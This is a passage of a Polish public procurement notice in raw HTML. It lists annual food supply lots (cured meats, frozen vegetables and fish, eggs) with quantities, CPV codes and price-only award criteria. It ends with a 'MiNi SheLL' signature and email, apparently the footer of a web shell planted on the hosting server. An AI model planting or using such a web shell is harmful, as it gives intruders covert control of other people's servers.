18.		Kiełbasa  krakowska parzona	kg	250
19.		Kiełbasa biała żurkowa	kg	300
20.		Szynka wędzona	kg	15
21.		Ogonówka wieprzowa wędzona 	kg	25
22.		Boczek wędzony	kg	150
23.		Pasztet pieczony wieprzowy	kg	160
24.		Salceson  włoski	kg	230
25.		Salceson  czarny	kg	70
26.		Pasztetowa wieprzowa	kg	180
27.		Kaszanka jęczmienna	kg	250
28.		Kiełbasa szynkowa drobiowa	kg	180
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cen</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI 
                  
                <b>Nazwa: </b>Art. spożywcze mrożone, ryby wędzone i solone<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	szt.	800
2.		Mieszanka kompotowa mrożona                          	kg	500
3.		Mieszanka warzywna mrożona 	kg	350
4.		Filet mrożony z miruny	kg	600
5.		Filety śledziowe bez skóry solone	kg	60
6.		Makrela wędzona bez głowy	kg	50
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VII
                  
                <b>Nazwa: </b>Jaja<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	szt.	22 000

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com